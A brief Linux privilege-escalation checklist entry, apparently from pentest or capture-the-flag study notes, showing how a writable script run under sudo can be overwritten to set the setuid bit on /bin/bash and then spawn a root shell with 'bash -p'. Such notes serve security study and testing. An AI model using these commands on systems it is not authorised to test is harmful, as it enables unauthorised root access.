Checklist (priv esc)
Linux
Edit access on sudo script
echo 'chmod u+s /bin/bash' > /path/to/script/file.sh
#then type
/bin/bash -p #to get root shellLast updated